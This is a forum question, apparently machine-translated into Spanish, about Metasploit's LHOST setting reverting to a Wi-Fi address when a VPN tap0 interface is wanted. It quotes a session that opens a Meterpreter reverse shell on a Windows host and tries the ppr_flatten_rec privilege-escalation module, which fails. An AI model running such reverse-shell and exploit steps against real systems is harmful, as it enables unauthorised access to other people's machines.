Cuando uso metasploit en Kali Linux versión actualizada hasta la fecha, cuando uso exploit / multi / handler con windows / meterpreter / reverse_tcp y exploits locales sobre meterpreter, el El campo LHOST se cambia automáticamente a la interfaz IP Wi-Fi, cuando en realidad quiero usar tap0, que es la interfaz VPN.
He intentado resolver el problema con:
set LHOST <tap0 IP>
setg LHOST <tap0 IP>
set INTERFACE tap0
setg INTERFACE tap0
set interface tap0
set interface tap0
Pero luego, al usar el comando ejecutar , la víctima intenta conectarse a mi IP Wi-Fi, que obviamente no es accesible desde la VPN.
He tenido este problema durante al menos 6 meses, independientemente de cuándo actualice Kali o metasploit. Aprecio si alguien sabe cuál es la forma correcta de configurar metasploit.
[Editar: Más detalles]
Ejemplo del problema:
msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ppr_flatten_rec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(windows/local/ppr_flatten_rec) > run
[*] Started reverse TCP handler on 192.168.85.158:4444
Todo el contexto es:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.1:443
[*] Sending stage (179779 bytes) to 192.168.22.55
[*] Meterpreter session 1 opened (192.168.0.1:443 -> 192.168.22.55:49202) at 2018-01-10 23:27:30 -0500
meterpreter >
Background session 1? [y/N]
msf exploit(multi/handler) > use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(windows/local/ppr_flatten_rec) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ppr_flatten_rec) > set LHOST **192.168.0.1**
LHOST => 192.168.0.1
msf exploit(windows/local/ppr_flatten_rec) > run
[*] Started reverse TCP handler on **192.168.85.158**:4444
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system.
[*] Exploit completed, but no session was created.
msf exploit(windows/local/ppr_flatten_rec) > show options
Module options (exploit/windows/local/ppr_flatten_rec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
WAIT 10 yes Number of seconds to wait for exploit to run
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.85.158 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic